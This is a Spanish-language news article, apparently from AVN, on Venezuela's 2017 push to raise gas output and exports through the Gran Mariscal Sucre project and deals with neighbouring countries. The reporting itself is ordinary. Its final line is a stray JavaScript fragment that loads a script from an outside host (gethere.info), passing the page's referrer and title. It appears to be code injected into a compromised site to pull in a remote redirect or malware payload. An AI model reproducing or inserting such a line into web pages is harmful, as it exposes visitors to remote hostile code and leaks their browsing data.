Economía

Aumentar producción gasífera nacional es prioridad en el Motor Hidrocarburos

AVN.-
Desarrollar y mejorar los proyectos gasíferos en el país para aumentar la producción y acelerar la exportación hacia naciones vecinas es una de las prioridades del Motor Hidrocarburo para este 2017.

El ministro para Petróleo, Eulogio Del Pino, informó en declaraciones recientes que hay una agenda definida para fortalecer proyectos estratégicos, en especial los relacionados al área gasífera.

Uno de los proyectos a impulsar es el Gran Mariscal Sucre, que contempla el desarrollo de cuatro campos ubicados en el Norte de la Península de Paria, Dragón y Patao (gas no asociado), Mejillones (gas húmedo) y Río Caribe (condensado). Para octubre del año pasado registraba un avance superior al 90%.

A largo plazo la estatal Petróleos de Venezuela (Pdvsa) prevé producir 1.200 millones de píes cúbicos de gas al día y hasta 28 mil barriles diarios (mbd) de condensados, de los cuales gran parte se destinarán a la exportación.

De este complejo se impulsará la exportación de gas a refinerías de países del Caribe como Aruba y Curazao, naciones con las que Venezuela reforzó las alianzas en 2016.

También, el pasado 28 de septiembre la estatal suscribió un contrato con la empresa Petromil Gas de Colombia para exportar hasta 50 Mmpcd provenientes de los campos de gas en el Golfo de Venezuela.

Aunado a ello, el pasado 5 de diciembre Venezuela y Trinidad y Tobago sellaron tres acuerdos estratégicos. Uno de ellos contempla la exportación de gas natural desde el Campo Dragón.

Pdvsa logró incrementar la producción de gas por 230 millones de pies cúbicos diarios el año pasado, que permitieron sostener la generación eléctrica y satisfacer la demanda interna.

Para este año la estatal prevé desarrollar un plan para mejorar de forma eficiente el sistema de distribución de gas doméstico en todo el país, con la participación de las comunidades organizadas.

“Vamos a apoyar a las comunidades organizadas, a los Consejos Comunales, para que puedan distribuir de forma justa las bombonas de gas, hacer llegar la bombona de gas a nuestro pueblo sin intermediarios, sin especulación, de una forma eficiente”, resaltó Del Pino.

En 2015 Venezuela se ubicó en el sexto puesto a escala mundial, con una reserva de gas natural por el orden de 197,1 billones de pies cúbicos.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;